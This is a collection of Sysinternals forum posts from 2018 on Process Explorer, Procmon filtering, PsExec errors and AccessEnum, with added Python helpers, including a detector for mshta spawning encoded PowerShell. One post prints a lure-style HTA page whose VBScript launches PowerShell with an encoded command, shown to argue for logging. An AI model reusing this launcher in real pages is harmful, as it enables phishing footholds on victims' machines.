Channel: Sysinternals Forums

Process Explorer : Search takes 15 minutes with no results

Author: Geoffrey Stuart
Subject: Search takes 15 minutes with no results
Posted: 07 April 2018 at 7:56pm

My Quicken app will not open, error says the file is in use.  

I entered the path and file name in PE to find what process had the file open, but the search took over 15 minutes and found nothing. What to try next?  And why is PE taking so long to search?

Process Explorer : Select Columns

Author: malishich
Subject: Select Columns
Posted: 08 April 2018 at 5:47am

I suggest adding a new option (check box) to the "Select Columns" dialog to show the number of open TCP/IP sockets for the process. Probably it could be the number of UDP sockets and the number of TCP sockets.

Process Explorer : BUG: Process Explorer fails to show DLLs

Author: Maximus5
Subject: BUG: Process Explorer fails to show DLLs
Posted: 09 April 2018 at 3:37pm

The DLLs list in Lower Pane View is completely empty. For any process (32/64 bit, elevated or not).
There are even no column headers.

It is strange, but for the same processes ProcessExplorer is able to show Handles.

Process Explorer v16.21
Windows 10 (16299.334)

Process Monitor : Detail Column

Author: justusiv
Subject: Detail Column
Posted: 09 April 2018 at 9:14pm

I am trying to monitor a file server that hosts a share. I am wondering if someone could give some insight into the Detail column.

I find that the Operation "IRP_MJ_CREATE" has the data I am after, but deciphering the Detail column is a pain. Once I filter on that, all the filtering then needs to be done from the Detail column. Let's say I want to monitor deletes. It appears in a few locations. I can't just filter on delete as I get a ton of hits. I have found two possible items from here: "Desired Access: Delete" and "Options: Delete On Close". Not sure what would be better to filter on, as I am after 1 hit per deletion. In addition, how do I know I wouldn't be missing some sort of other delete?

The next pain point is that under these sub-categories I never know what other results are going to be included, so I have a hard time filtering properly. For example it could be "Desired Access: Read Attributes, Delete" or "Desired Access: Generic Read/Write, Delete". So any guidance on that would be helpful as well. It would make life easier if they were split out into their own column.


Edited by justusiv - 4 hours 35 minutes ago at 9:16pm
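As an added example that is not part of the post (it assumes Procmon's standard CSV export columns; the rows are constructed): this Python splits the Detail column of IRP_MJ_CREATE events on Procmon's known field names, so Desired Access and Options become their own fields, and it also catches the other place a deletion is logged, the SetDispositionInformationFile operation with Detail "Delete: True", which is the one-event-per-deletion signal. "Desired Access: Delete" alone over-counts, because a rename requests DELETE access too.

```python
import csv
import io
import re

# Field names Procmon writes into the Detail column of IRP_MJ_CREATE events.
CREATE_FIELDS = ("Desired Access", "Disposition", "Options", "Attributes",
                 "ShareMode", "AllocationSize", "OpenResult", "Impersonating")
FIELD_RE = re.compile(r"(?:^|, )(" + "|".join(map(re.escape, CREATE_FIELDS)) + r"): ")

def split_detail(detail):
    """Split 'Key: v1, v2, Key2: v3' into {'Key': 'v1, v2', 'Key2': 'v3'}.
    The values contain commas themselves, so the split is on the known key names."""
    hits = list(FIELD_RE.finditer(detail))
    fields = {}
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(detail)
        fields[m.group(1)] = detail[m.end():end]
    return fields

def is_delete(operation, detail):
    """Flag the two places a deletion shows up. DELETE access is also requested
    for renames, so 'Desired Access: Delete' alone over-counts; the
    SetDispositionInformation event is the one-per-deletion signal."""
    if operation == "IRP_MJ_CREATE":
        f = split_detail(detail)
        access = [a.strip() for a in f.get("Desired Access", "").split(",")]
        options = [o.strip() for o in f.get("Options", "").split(",")]
        return "Delete" in access or "Delete On Close" in options
    if operation.startswith("SetDispositionInformation"):
        # Newer builds log SetDispositionInformationEx with FILE_DISPOSITION_DELETE flags.
        return "Delete: True" in detail or "FILE_DISPOSITION_DELETE" in detail
    return False

def find_deletes(csv_text):
    """Return (process, path, operation) for each delete-related row of a Procmon CSV export."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return [(r["Process Name"], r["Path"], r["Operation"])
            for r in rows if is_delete(r["Operation"], r["Detail"])]

# Constructed sample in Procmon's CSV export layout (not a real capture).
SAMPLE_CSV = r"""Time of Day,Process Name,PID,Operation,Path,Result,Detail
"10:01:02.1","explorer.exe","1234","IRP_MJ_CREATE","C:\Shares\docs\old.txt","SUCCESS","Desired Access: Read Attributes, Delete, Disposition: Open, Options: Open Reparse Point, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a, OpenResult: Opened"
"10:01:02.2","explorer.exe","1234","SetDispositionInformationFile","C:\Shares\docs\old.txt","SUCCESS","Delete: True"
"10:01:03.0","notepad.exe","2222","IRP_MJ_CREATE","C:\Shares\docs\notes.txt","SUCCESS","Desired Access: Generic Read/Write, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: n/a, OpenResult: Opened"
"10:01:04.0","cmd.exe","3333","IRP_MJ_CREATE","C:\Shares\tmp\scratch.tmp","SUCCESS","Desired Access: Generic Write, Read Attributes, Delete, Disposition: Create, Options: Synchronous IO Non-Alert, Non-Directory File, Delete On Close, Attributes: N, ShareMode: None, AllocationSize: 0, OpenResult: Created"
"""
```

Running `find_deletes(SAMPLE_CSV)` on the constructed rows flags the explorer.exe create, its SetDispositionInformationFile, and the cmd.exe Delete On Close create, and skips the plain notepad.exe open.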

Internals : NtRaiseHardError in ntdll.dll

Author: Arush
Subject: NtRaiseHardError in ntdll.dll
Posted: 10 April 2018 at 3:28am

It seems like I can only find ZwRaiseHardError in ntdll.dll. Is there a way that I can see NtRaiseHardError?

Miscellaneous Utilities : RAMMap doesn't work in Windows insider preview

Author: MagicAndre1981
Subject: RAMMap doesn't work in Windows insider preview
Posted: 10 April 2018 at 6:30pm

RAMMap uses an unofficial API to query the PFN database. This API/data structure changes over time in new Windows 10 builds. Wait until Mark provides a working version for Windows 10 v1803.

Autoruns : Remove "File not Found"

Author: Chalek37
Subject: Remove "File not Found"
Posted: 10 April 2018 at 7:24pm

My system is working Ok.
I have found in AutoRuns about 12 instances of File not found.
If I delete those instances will I be able to note a reduction in my bootup time?
What are the potential problems?

Malware : Gpu based paravirtualization rootkit, all os vulne

Author: lil_king420
Subject: Gpu based paravirtualization rootkit, all os vulne
Posted: 11 April 2018 at 5:42am

Hello again to my 'favorite' Clown thread on the interwebz. 

I have no new information really, still dealing with this 'problem' and even though I have invested many more hours into researching this, whatever it is, I don't feel any closer to an answer and cannot report any progress this time. 

I see a couple new names/posts... welcome!!! And I want to thank explicitly ALL of you who have participated in this thread.  I know how most of you feel, this sh*t makes a person truly feel as though we are crazy.  Just know you are not alone and that others are still working to expose the malicious weirdness we speak of here.

RFC Rudel's original post was over 6 years ago (incidentally I see his post is missing) but I am glad this thread remains open and unmolested by moderators... with the exception of Rudel's post... however that happened.  Anyhow, the reason I am adding another bump to this thread is below...

I wanted to add a link to an MS document that, IMHO, shows MS acknowledging that what we talk about in this thread is no figment of anyone's imagination.  I realize the article is basically an advertisement for the Win10 Secure Boot and other errant attempts to secure the windows environment but my point remains, this is MS admitting they cannot protect users...

https://docs.microsoft.com/en-us/windows/security/hardware-protection/secure-the-windows-10-boot-process

and I quote, "rootkits have the same rights as the operating system and start before it, they can completely hide themselves and other applications."

it goes on to actually define the various incarnations as follows....

Different types of rootkits load during different phases of the startup process:

  • Firmware rootkits. These kits overwrite the firmware of the PC’s basic input/output system or other hardware so the rootkit can start before Windows.
  • Bootkits. These kits replace the operating system’s bootloader (the small piece of software that starts the operating system) so that the PC loads the bootkit before the operating system.
  • Kernel rootkits. These kits replace a portion of the operating system kernel so the rootkit can start automatically when the operating system loads.
  • Driver rootkits. These kits pretend to be one of the trusted drivers that Windows uses to communicate with the PC hardware.

@Tink03 - I can speak to your permissions comment in that there absolutely are files and folders in Windows that you do not want access to, for example, the "Application Data" folder.  By default, even as an administrator, you will get an access denied error.  What I have learned the hard way is that giving yourself full control of this folder results in a redundant loop of symbolic links or junctions that, if allowed to persist, will consume an entire hard drive.  The permissions of that folder require the group EVERYONE = DENIED.  A simple explanation can be found here...
https://answers.microsoft.com/en-us/windows/forum/windows_7-files/multiple-application-data-files-folders-nested/53c5439d-a33f-44da-a0ca-e94bb3e15c1f?auth=1
and a more complete explanation is here;
https://www.sevenforums.com/general-discussion/115149-stop-application-data-folder-replicating.html#post990903

This is only one example, but there are many instances where one does not want to be able to access something on their own PC.  Hopefully this helps a little.  Just be mindful of this, as ignoring it can and does wreak havoc to the point of bricking a device completely.

So till my next post, stay safe, remain vigilant, avoid speculation and do not give up.

The answer will be found eventually! 

Knowledge is free... understand it... then share!


Autoruns : Remove "File not Found"

Author: Dax1792
Subject: Remove "File not Found"
Posted: 11 April 2018 at 9:44am

You will not notice any difference in start time. Not everything Autoruns lists runs at boot and that is too few to make a difference anyway.
 
Autoruns is not always right. You could end up with a system which does not boot. 

PsTools : Psexec - process exited with error

Author: dexter
Subject: Psexec - process exited with error
Posted: 11 April 2018 at 2:17pm

Hello. I'm trying to remotely execute a process using psexec. Both systems are logged in as the same local account with administrator rights. When I run the command:

psexec \\SYSTEM "c:\program files\..." 

It seems to successfully connect and load pstools on the remote system but I get an error back:

c:\program files\... exited on SYSTEM with error code -1066598274

Some searching led me to believe this error has something to do with accounts not having local administrator rights. Like I said, the account I'm using is a local account that is on both systems and is in the administrator group. I've tried running as the Administrator account with the same result.

Please help. 

Autoruns : Remove "File not Found"

Author: Chalek37
Subject: Remove "File not Found"
Posted: 12 April 2018 at 1:11am

Thanks for your reply. I'll leave well enough alone!

Site Bugs : ACTION REQUIRED - Migration to Technet Forums

Author: lukim
Subject: ACTION REQUIRED - Migration to Technet Forums
Posted: 12 April 2018 at 3:04am

Additional note regarding Private Messages: *Private Messages will NOT be migrated*

If you want to keep a copy of your private messages, you will need to save/export them manually yourself.

PsTools : Psexec - process exited with error

Author: Aditza
Subject: Psexec - process exited with error
Posted: 14 April 2018 at 3:03am

On POSReady 2009, if you installed the updates regularly (as you should), then starting with kb4056615 the way NTFS.SYS processes the ACL rules changes.
https://www.catalog.update.microsoft.com/Search.aspx?q=kb4056615

This ntfs.sys change conflicts with some antivirus packages that expect a different ntfs.sys, and when you try to create files you will get this error message in some folders:
"This security ID may not be assigned as the owner of this object."
In my case the problem is with Symantec Endpoint Protection v12.1.6 MP9 - if I uninstall the antivirus then the error does not occur. Their support team in India is useless, and at the end of January 2018 I gave up because their only concern was to close the ticket faster (it was 3 weeks old by that point, for a CRITICAL issue).
The problem with Symantec is still present today, but I hope to dump any remaining POSReady 2009 systems by the end of the year because it becomes EOL in 2019.

In short: even if you have administrative or full access rights, if you are not the owner of the folder then you are not allowed to create new files in that folder.

The work-around solution is to take ownership of the folder where you are trying to create the files (or temporary files), because full-access or administrative rights are not enough anymore in this case.
Not even the SYSTEM account is spared from this feature/bug, and a LOT of installs will fail with MSI permissions errors.

This is also the reason why practically ALL Microsoft .NET framework patches for POSReady 2009 will fail to install on such systems - they try to use a temporary folder that is not OWNED by the SYSTEM account.
The solution for that is to use 'psexec -sdi ' and manually install the failing updates from a command-prompt that runs as SYSTEM account. Make sure to change the ntfs owner for "C:\Windows\Installer" to also be SYSTEM.

When the first setup screen appears then let it wait and go check that the permissions of the temporary folder used by the installer also have SYSTEM as the owner. This temporary folder is created by the .NET installer in the root of a random non-removable drive on the system and it will have a randomly-generated name.


Edit: hmmmm... I just saw that KB4101864 was published a few days ago... I'll have to test it next week; hopefully it fixes the owner-only file creation limitation.
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4101864

File name   File version    File size   Date          Time    Platform   SP requirement   Service branch
Ntfs.sys    5.1.2600.7459   576,640     02-Apr-2018   23:28   x86        SP3              SP3QFE

This update replaces the following updates:
2018-01 Security Update for Windows XP Embedded SP3 for x86-based Systems (KB4056615)



Edited by Aditza - 2 hours 4 minutes ago at 5:06am

Miscellaneous Utilities : Sysmon Feature Request: Log Source of DCOM Calls

Author: GregAskew
Subject: Sysmon Feature Request: Log Source of DCOM Calls
Posted: 14 April 2018 at 5:54pm

It doesn't have to be a downloaded hta. It can be in-line in an html web page or html email.

<!DOCTYPE html>
<html>
    <head>
        <HTA:APPLICATION ID="host" BORDER="thin" BORDERSTYLE="complex" maximizeButton="yes" minimizeButton="yes" scroll="no"/>
        <title>Sample</title>
    </head>
    <script for="prize" event="onClick" language="VBScript">
Dim notMal
Set notMal = CreateObject("WScript.Shell")
notMal.Run "powershell.exe       -e       VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA=="
    </script>
    <body>
        <p>
You're our millionth victim!
        </p>
        <p>
            <form>
                <input type="button" value="Claim my prize!"/>
            </form>
        </p>
    </body>
</html>


Allowing mshta.exe to run is a sure-fire way to allow adversaries a foothold in your environment.

Source:
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
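From the defender's side, as an added example that is not part of the post or of Sysmon itself: the Python below takes a Sysmon Event ID 1 (process create) record, flags a PowerShell child of mshta.exe and decodes the -EncodedCommand argument (base64 of UTF-16LE) so the analyst sees the plaintext the HTA above would run. The event XML is constructed from that HTA, not taken from a real log.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

def event_data(xml_text):
    """Collect the <Data Name=...> fields of a Sysmon event into a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.iterfind(".//e:EventData/e:Data", NS)}

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # bad padding or odd byte count: not a real encoded command
        return None

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def check_process_create(xml_text):
    """Findings for one Sysmon Event ID 1 record: mshta.exe parent, encoded PowerShell."""
    d = event_data(xml_text)
    findings = []
    if basename(d.get("ParentImage", "")) == "mshta.exe":
        findings.append("spawned by mshta.exe")
    if basename(d.get("Image", "")) in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(d.get("CommandLine", ""))
        if decoded is not None:
            findings.append("encoded command decodes to: " + decoded)
    return findings

# Constructed Sysmon Event ID 1 record (not a real log), built from the HTA above.
# Its -e argument decodes to: Write-Host "PWNED"; read-host
SAMPLE_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe       -e       VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA==</Data>
    <Data Name="ParentImage">C:\Windows\System32\mshta.exe</Data>
  </EventData>
</Event>"""
```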

Process Explorer : Procexp -> Network in mbit

Author: bogy
Subject: Procexp -> Network in mbit
Posted: 15 April 2018 at 2:22pm

Would it be possible to show the active network traffic (the graph, next to disk, cpu, gpu, ...) in mbit per second instead of mbyte per second?
This would make things a lot handier, as all network connections are set up in mbit speeds and data throughput is also measured in mbps; only file sizes or spaces (disk space, memory space) are measured in mbyte.

If there is a switch (registry setting) that would be able to change this, I'd love to hear it.
If not, then please allow us to change it (if people want to keep it like it is now, please give us the opportunity to change it for ourselves); it's only a division by 8 that makes the difference.

thanks!

Process Explorer : Process launched by "Open With..." is not visible

Author: vadimrapp
Subject: Process launched by "Open With..." is not visible
Posted: 15 April 2018 at 4:07pm

In Windows 10, if I run Wordpad from the Start Menu, I see it in Process Explorer, as expected. It's also visible if I open a file for which Wordpad is the default application by double-click. But if it's not the default application for the file, and I run it by right-clicking a .doc file, selecting "Open With...", and selecting Wordpad, Wordpad does not show up in Process Explorer. Dragging the target icon onto its window results in the error message "The owning process is wordpad.exe (process ID xxxxx), which is not currently visible in the process list". Why is it not visible?

Site Bugs : ACTION REQUIRED - Migration to Technet Forums

Author: sitary
Subject: ACTION REQUIRED - Migration to Technet Forums
Posted: 15 April 2018 at 6:02pm

Do you know yet what forum Sysinternals will be in? Windows Tools?

Thanks,

Simon

Miscellaneous Utilities : AccessEnum showing only ???

Author: steve3140
Subject: AccessEnum showing only ???
Posted: 15 April 2018 at 11:30pm

I rarely visit these forums, so sorry for such a late response to your question.
 
I have noticed these ?????? files as well.  It is my belief that these are caused by a pathname+filename length which exceeds some limit, somewhere around 250 characters.
 
Usually this can therefore be fixed by renaming either folders which are somewhere in the path, or shortening the filename, or some combination of those.

Miscellaneous Utilities : AccessEnum and long pathnames

Author: steve3140
Subject: AccessEnum and long pathnames
Posted: 15 April 2018 at 11:36pm

I know that AccessEnum is really old, however there is a display issue when it encounters a really long pathname+filename ... the security permissions simply display as a set of question marks ???
 
Once the pathname+filename is shortened to somewhere around 240 characters or less, the permissions display correctly.
 
This in turn prompts me to suggest that some other pathname+filename length checking tool might be useful.  I have never understood why Microsoft's filesystem has these apparent limitations.  Preferably it should stop you from placing the excessively long folder+file combination in the first place.
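The length-checking tool suggested above, as an added example that is not part of the post or of AccessEnum: this Python walks a tree and reports every path longer than a limit (240 by default, below the 260-character Win32 MAX_PATH), using the \\?\ prefix on Windows so the walk itself is not stopped by the same limit. The demo tree it builds in a temp directory is constructed for illustration.

```python
import os
import tempfile

DEFAULT_LIMIT = 240  # AccessEnum starts showing ??? around here; Win32 MAX_PATH is 260

def find_long_paths(root, limit=DEFAULT_LIMIT):
    """Return (length, path) for every file or directory under root whose full
    path is longer than limit, longest first. On Windows the walk uses the
    \\\\?\\ prefix so entries beyond MAX_PATH are still enumerated; the reported
    length is that of the unprefixed path the ordinary tools see."""
    root = os.path.abspath(root)
    walk_root = root
    if os.name == "nt" and not root.startswith("\\\\?\\"):
        walk_root = "\\\\?\\" + root
    hits = []
    for dirpath, dirnames, filenames in os.walk(walk_root):
        plain = dirpath[4:] if dirpath.startswith("\\\\?\\") else dirpath
        for name in dirnames + filenames:
            full = os.path.join(plain, name)
            if len(full) > limit:
                hits.append((len(full), full))
    hits.sort(reverse=True)
    return hits

def make_demo_tree():
    """Build a constructed tree in a temp dir with one path well over the limit."""
    base = tempfile.mkdtemp()
    deep = os.path.join(base, *(["a_fairly_long_folder_name"] * 8))
    os.makedirs(deep)
    long_file = os.path.join(deep, "permissions_report_final_v2.txt")
    open(long_file, "w").close()
    open(os.path.join(base, "short.txt"), "w").close()
    return base, long_file
```

Run `find_long_paths` against the share root before an AccessEnum pass to see which entries will come back as question marks.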